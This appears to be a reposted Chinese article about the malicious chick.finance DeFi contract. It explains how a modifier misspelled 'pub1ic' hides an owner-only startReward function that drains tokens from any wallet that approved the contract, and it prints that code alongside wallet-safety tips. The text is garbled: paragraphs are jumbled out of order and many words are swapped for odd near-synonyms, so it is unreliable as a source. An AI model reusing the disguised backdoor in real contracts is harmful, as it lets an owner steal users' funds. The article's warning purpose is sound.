内容如下:

网上报道说，8月25日，YFII 传递了 chick.finance 合约代码的风险，不外个中提到的“用户充值的所有代币，开拓者都有权限提取”这句话其实并不是完全精确的，因此在这里我们需要给各人做下更具体的描写：

周末时间名贵，本日长文就上面这些内容。我向各人烦琐几个要害点可以防备上述风险问题。

这其实是 DeFi 生态里很是严重的恶性事件，理应引起全行业的重视，因为这次大概恶意开拓者只是用拼写错误的方法来试图蒙骗各人（把 public 写成 pub1ic），然后很幸运的第一时间被发明白，，那下次呢？是不是可以写出逻辑巨大而且很难被看出来的裂痕，悄悄的期待上线把列位的钱包一扫而空呢？

要再次强调的是，这个例子中，您损失的可不只仅是您存入合约的资产，而是你钱包里的全部资产，大白了吗？

我想起最近一个月，我也努力介入DEFI的热点，参加了不少挖矿。

第一个是不要嫌贫苦，保管好本身主要钱包。每次拿出别的一个小号的钱包，介入各类deFi挖矿勾当。这个钱包里不要放太多的钱，需要用的话随时转进去。

大大都人城市躲不外去的！

万卉Dovey: 没有自带合约审计。。谁敢玩新的矿

这正是比特派安详尝试室在之前的那篇《以太坊 Defi 生态当前最大的安详隐患》一文中提到的“滥用合约授权问题”。

恶意代码是如下这段：

我们之前在向全行业提出“滥用合约授权”问题的时候，就曾估量到大概会有开拓者作恶的环境呈现，没想到这一天来的这么快，这次代码伪装的较量蠢，那下次呢？下次 DeFi 矿工们是否还能躲得已往了呢？

上述代码的逻辑很简朴，干的就是那些给这个合约授权了的用户，合约 Owner 都能把你的代币转给 Owner，就这么简朴。

于是深入研究一下，网上又搜到一篇报道。

于是深入研究雷同报道，下面发给各人比特派一篇更具体的研究文章。

modifier pub1ic() {require(isOwner(), "Ownable: caller is not the owner");_;}

大佬神鱼BTCer也回覆到: 套路很溜啊！

第二是不要介入未经审计的合约挖矿，就算要介入，也是拿点小钱，就算丢了也不心疼的金额介入。

该合约恶意代码的问题并不在于“开拓者事发后能提取用户存在合约中的代币”（开拓者原来就醒目这事儿），而在于对付任何给该合约授权了的用户，开拓者都能把你钱包里的代币一扫而空（不只仅是你存入合约的）

function startReward(address _from, uint256 amount) external pub1ic{weth.safeTransferFrom(_from, owner(), amount);}

开拓者对存心拼写错误的 pub1ic 做了如下约束（也就是只有合约 Owner 才气挪用，假如没这个挪用，那就酿成谁都醒目这事儿了，开拓者想的是本身偷，必定不想让别人偷）

郑重声明：本文版权归原作者所有，转载文章仅为传播更多信息之目的，如作者信息标记有误，请第一时间联系我们修改或删除，多谢。